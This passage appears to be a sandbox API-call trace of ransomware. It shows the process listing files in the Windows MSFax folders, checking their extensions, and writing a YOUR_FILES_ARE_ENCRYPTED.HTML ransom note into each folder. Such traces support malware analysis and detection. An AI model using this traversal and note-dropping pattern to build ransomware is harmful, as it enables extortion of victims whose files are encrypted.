ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x3aa0, dwReserved0=0x0, dwReserved1=0x60, cFileName="generic.cov", cAlternateFileName="")) returned 1 [0157.429] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 81 [0157.429] lstrcmpW (lpString1="generic.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.429] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0157.429] lstrlenW (lpString=".cov") returned 4 [0157.429] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0157.429] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x2886, dwReserved0=0x0, dwReserved1=0x60, cFileName="urgent.cov", cAlternateFileName="")) returned 1 [0157.429] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 80 [0157.429] lstrcmpW (lpString1="urgent.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.429] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0157.429] lstrlenW (lpString=".cov") returned 4 [0157.429] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0157.429] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, 
ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x2886, dwReserved0=0x0, dwReserved1=0x60, cFileName="urgent.cov", cAlternateFileName="")) returned 0 [0157.429] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.430] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0157.430] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.430] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.433] CloseHandle (hObject=0x4a8) returned 1 [0157.433] GetProcessHeap () returned 0x270000 [0157.435] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.435] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", 
cAlternateFileName="")) returned 0 [0157.435] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.435] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0157.435] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.435] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.438] CloseHandle (hObject=0x5a0) returned 1 [0157.438] GetProcessHeap () returned 0x270000 [0157.440] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.440] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Inbox", cAlternateFileName="")) returned 1 [0157.440] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 51 [0157.440] GetProcessHeap () returned 0x270000 [0157.440] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 
0x73f0050 [0157.440] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox" [0157.440] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*" [0157.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.440] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.440] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, 
ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.440] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.441] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0157.441] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\inbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.441] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.444] CloseHandle (hObject=0x5a0) returned 1 [0157.444] GetProcessHeap () returned 0x270000 [0157.445] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.445] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Queue", cAlternateFileName="")) returned 1 [0157.445] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue") returned 51 [0157.445] GetProcessHeap () returned 
0x270000 [0157.445] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.445] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue" [0157.445] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*" [0157.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.446] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.446] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, 
ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.446] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.446] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0157.446] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\queue\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.447] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.449] CloseHandle (hObject=0x5a0) returned 1 [0157.450] GetProcessHeap () returned 0x270000 [0157.451] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.451] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="SentItems", cAlternateFileName="SENTIT~1")) returned 1 [0157.451] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 55 [0157.451] GetProcessHeap () returned 0x270000 [0157.451] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.451] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems" [0157.451] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*" [0157.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.451] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.452] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.452] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.452] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0157.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\sentitems\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.452] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.455] CloseHandle (hObject=0x5a0) returned 1 [0157.455] GetProcessHeap () returned 0x270000 [0157.456] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.457] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 1 [0157.457] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 58 [0157.457] GetProcessHeap () returned 0x270000 [0157.457] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.457] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0157.457] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*" [0157.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.458] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.458] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.458] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 64 [0157.458] GetProcessHeap () returned 0x270000 [0157.459] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.459] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0157.459] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*" [0157.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, 
ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.460] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.460] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0x0, dwReserved1=0x60, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 1 [0157.460] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned 79 [0157.460] lstrcmpW (lpString1="WelcomeFax.tif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.460] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0157.460] lstrlenW (lpString=".tif") returned 4 [0157.460] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0157.460] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, 
